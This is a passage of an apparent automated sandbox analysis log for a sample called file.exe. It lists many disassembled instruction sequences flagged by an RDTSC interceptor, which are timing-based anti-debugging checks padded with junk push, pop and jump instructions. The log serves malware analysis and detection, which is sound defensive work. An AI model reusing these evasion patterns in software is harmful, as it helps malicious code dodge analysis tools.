                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CAB8 second address: 116CACD instructions: 0x00000000 rdtsc 0x00000002 jne 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jng 00007F99A4D68166h 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116CACD second address: 116CAEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push edx 0x00000006 jmp 00007F99A452D6CEh 0x0000000b pop edx 0x0000000c popad 0x0000000d push edx 0x0000000e jng 00007F99A452D6CEh 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C59A second address: 116C5A0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C5A0 second address: 116C5A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C5A4 second address: 116C5B6 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F99A4D6816Eh 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C71A second address: 116C737 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6D9h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C737 second address: 116C73B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C73B second address: 116C741 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C741 second address: 116C764 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jmp 00007F99A4D68179h 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C764 second address: 116C79F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6CFh 0x00000007 jmp 00007F99A452D6CDh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e jnp 00007F99A452D6CAh 0x00000014 push edx 0x00000015 pop edx 0x00000016 pushad 0x00000017 popad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b je 00007F99A452D6C8h 0x00000021 push eax 0x00000022 push edx 0x00000023 pushad 0x00000024 popad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C79F second address: 116C7A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7A3 second address: 116C7BC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7BC second address: 116C7C2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7C2 second address: 116C7C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7C8 second address: 116C7E0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68174h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7E0 second address: 116C7E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 116C7E9 second address: 116C7EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0D0 second address: 117B0D6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0D6 second address: 117B0DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0DA second address: 117B0E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F99A452D6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B0E6 second address: 117B10E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 pop ebx 0x00000007 jl 00007F99A4D68166h 0x0000000d jne 00007F99A4D68166h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jmp 00007F99A4D68172h 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B10E second address: 117B118 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F99A452D6C6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B118 second address: 117B126 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B126 second address: 117B137 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 js 00007F99A452D6C6h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B137 second address: 117B13D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B13D second address: 117B142 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B142 second address: 117B161 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jng 00007F99A4D68166h 0x00000009 jmp 00007F99A4D6816Dh 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 jno 00007F99A4D68166h 0x00000017 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 117B161 second address: 117B165 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11836E9 second address: 1183712 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pop edi 0x00000006 pushad 0x00000007 jmp 00007F99A4D6816Ah 0x0000000c pushad 0x0000000d pushad 0x0000000e popad 0x0000000f pushad 0x00000010 popad 0x00000011 popad 0x00000012 jmp 00007F99A4D6816Ah 0x00000017 jnp 00007F99A4D68182h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118215D second address: 1182161 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182882 second address: 1182891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Bh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1182891 second address: 1182897 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11833EC second address: 11833F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F99A4D68166h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 118501D second address: 1185035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A452D6D2h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1185035 second address: 118503D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184E68 second address: 1184E6C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184E6C second address: 1184EAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edi 0x00000007 jmp 00007F99A4D6816Bh 0x0000000c jp 00007F99A4D68166h 0x00000012 pop edi 0x00000013 pushad 0x00000014 pushad 0x00000015 popad 0x00000016 jmp 00007F99A4D6816Bh 0x0000001b jmp 00007F99A4D6816Bh 0x00000020 popad 0x00000021 popad 0x00000022 pushad 0x00000023 jbe 00007F99A4D68168h 0x00000029 push esi 0x0000002a pop esi 0x0000002b push eax 0x0000002c push edx 0x0000002d push edi 0x0000002e pop edi 0x0000002f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184EAD second address: 1184EB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1184EB1 second address: 1184EBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push esi 0x00000008 pop esi 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 1188698 second address: 11886A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F99A452D6C6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11886A4 second address: 11886C8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Dh 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F99A4D68170h 0x00000011 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11886C8 second address: 11886D4 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007F99A452D6C6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE86D second address: 11AE871 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE871 second address: 11AE877 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE457 second address: 11AE45D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE45D second address: 11AE467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F99A452D6C6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11AE467 second address: 11AE470 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C421A second address: 11C421E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C308A second address: 11C309B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 jno 00007F99A4D6816Ch 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3636 second address: 11C3645 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 ja 00007F99A452D6C6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C395F second address: 11C3974 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F99A4D68166h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007F99A4D6816Bh 0x0000000f rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3974 second address: 11C398C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A452D6D4h 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3AE0 second address: 11C3AF2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F99A4D6816Dh 0x00000009 popad 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3AF2 second address: 11C3AFC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jns 00007F99A452D6C6h 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3C2E second address: 11C3C35 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop ebx 0x00000007 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3D6C second address: 11C3D86 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007F99A452D6D4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3D86 second address: 11C3DA7 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 jnp 00007F99A4D68166h 0x00000009 jmp 00007F99A4D6816Bh 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jg 00007F99A4D68180h 0x00000017 push eax 0x00000018 push edx 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3DA7 second address: 11C3DAD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C3DAD second address: 11C3DB1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6C0F second address: 11C6C19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6C19 second address: 11C6C1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6DA7 second address: 11C6DAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 11C6E68 second address: 11C6E6C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571035D second address: 5710363 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710363 second address: 5710367 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57103E2 second address: 5710420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F99A452D6D1h 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 call 00007F99A452D6CAh 0x00000018 pop ecx 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710420 second address: 5710449 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dx, 0262h 0x0000000a popad 0x0000000b mov ebp, esp 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 call 00007F99A4D68172h 0x00000015 pop eax 0x00000016 mov edi, 46B07036h 0x0000001b popad 0x0000001c rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710449 second address: 571044F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571044F second address: 5710453 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 10DABE0 second address: 10DABE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710496 second address: 571049C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571049C second address: 5710512 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F99A452D6CCh 0x00000008 pushfd 0x00000009 jmp 00007F99A452D6D2h 0x0000000e sbb cx, 4418h 0x00000013 jmp 00007F99A452D6CBh 0x00000018 popfd 0x00000019 popad 0x0000001a pop edx 0x0000001b pop eax 0x0000001c xchg eax, ebp 0x0000001d pushad 0x0000001e pushfd 0x0000001f jmp 00007F99A452D6D4h 0x00000024 sbb cx, AE78h 0x00000029 jmp 00007F99A452D6CBh 0x0000002e popfd 0x0000002f movzx esi, bx 0x00000032 popad 0x00000033 push eax 0x00000034 pushad 0x00000035 mov dl, 54h 0x00000037 popad 0x00000038 xchg eax, ebp 0x00000039 pushad 0x0000003a pushad 0x0000003b movzx esi, dx 0x0000003e pushad 0x0000003f popad 0x00000040 popad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov di, 42EEh 0x00000047 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710512 second address: 5710551 instructions: 0x00000000 rdtsc 0x00000002 mov esi, edx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov ebp, esp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov ch, 5Dh 0x0000000e pushfd 0x0000000f jmp 00007F99A4D6816Fh 0x00000014 and ecx, 3475D04Eh 0x0000001a jmp 00007F99A4D68179h 0x0000001f popfd 0x00000020 popad 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710551 second address: 5710561 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A452D6CCh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710561 second address: 5710579 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D6816Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pop ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710579 second address: 571057D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571057D second address: 5710598 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68177h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710622 second address: 571067C instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 call 00007F9A15FD108Fh 0x0000000c push 771B27D0h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 mov eax, dword ptr [esp+10h] 0x0000001c mov dword ptr [esp+10h], ebp 0x00000020 lea ebp, dword ptr [esp+10h] 0x00000024 sub esp, eax 0x00000026 push ebx 0x00000027 push esi 0x00000028 push edi 0x00000029 mov eax, dword ptr [77240140h] 0x0000002e xor dword ptr [ebp-04h], eax 0x00000031 xor eax, ebp 0x00000033 push eax 0x00000034 mov dword ptr [ebp-18h], esp 0x00000037 push dword ptr [ebp-08h] 0x0000003a mov eax, dword ptr [ebp-04h] 0x0000003d mov dword ptr [ebp-04h], FFFFFFFEh 0x00000044 mov dword ptr [ebp-08h], eax 0x00000047 lea eax, dword ptr [ebp-10h] 0x0000004a mov dword ptr fs:[00000000h], eax 0x00000050 ret 0x00000051 jmp 00007F99A452D6CCh 0x00000056 and dword ptr [ebp-04h], 00000000h 0x0000005a pushad 0x0000005b mov ax, 96FDh 0x0000005f jmp 00007F99A452D6CAh 0x00000064 popad 0x00000065 mov edx, dword ptr [ebp+0Ch] 0x00000068 jmp 00007F99A452D6D0h 0x0000006d mov esi, edx 0x0000006f push eax 0x00000070 push edx 0x00000071 jmp 00007F99A452D6D7h 0x00000076 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571067C second address: 57106EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68179h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov al, byte ptr [edx] 0x0000000b pushad 0x0000000c mov dx, cx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007F99A4D68176h 0x00000016 jmp 00007F99A4D68175h 0x0000001b popfd 0x0000001c mov cx, EE27h 0x00000020 popad 0x00000021 popad 0x00000022 inc edx 0x00000023 jmp 00007F99A4D6816Ah 0x00000028 test al, al 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e jmp 00007F99A4D6816Ah 0x00000033 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57106EE second address: 57106F4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57106F4 second address: 5710705 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F99A4D6816Dh 0x00000009 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710705 second address: 57106EE instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A452D6D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F99A452D63Dh 0x00000011 mov al, byte ptr [edx] 0x00000013 pushad 0x00000014 mov dx, cx 0x00000017 pushad 0x00000018 pushfd 0x00000019 jmp 00007F99A452D6D6h 0x0000001e jmp 00007F99A452D6D5h 0x00000023 popfd 0x00000024 mov cx, EE27h 0x00000028 popad 0x00000029 popad 0x0000002a inc edx 0x0000002b jmp 00007F99A452D6CAh 0x00000030 test al, al 0x00000032 push eax 0x00000033 push edx 0x00000034 push eax 0x00000035 push edx 0x00000036 jmp 00007F99A452D6CAh 0x0000003b rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710780 second address: 57107A5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F99A4D68171h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 lea ebx, dword ptr [edi+01h] 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov dx, 264Eh 0x00000013 mov edi, 0554595Ah 0x00000018 popad 0x00000019 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57107A5 second address: 57107D5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 call 00007F99A452D6CEh 0x00000008 pop esi 0x00000009 call 00007F99A452D6CBh 0x0000000e pop ecx 0x0000000f popad 0x00000010 pop edx 0x00000011 pop eax 0x00000012 mov al, byte ptr [edi+01h] 0x00000015 pushad 0x00000016 mov di, B2C8h 0x0000001a push eax 0x0000001b push edx 0x0000001c mov ebx, 688AF912h 0x00000021 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57107D5 second address: 57107FF instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 inc edi 0x00000008 jmp 00007F99A4D68175h 0x0000000d test al, al 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 mov di, 99BEh 0x00000016 mov cx, bx 0x00000019 popad 0x0000001a rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 57107FF second address: 5710805 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710805 second address: 5710819 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jne 00007F9A168003D8h 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 5710819 second address: 571081D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 571081D second address: 5710823 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
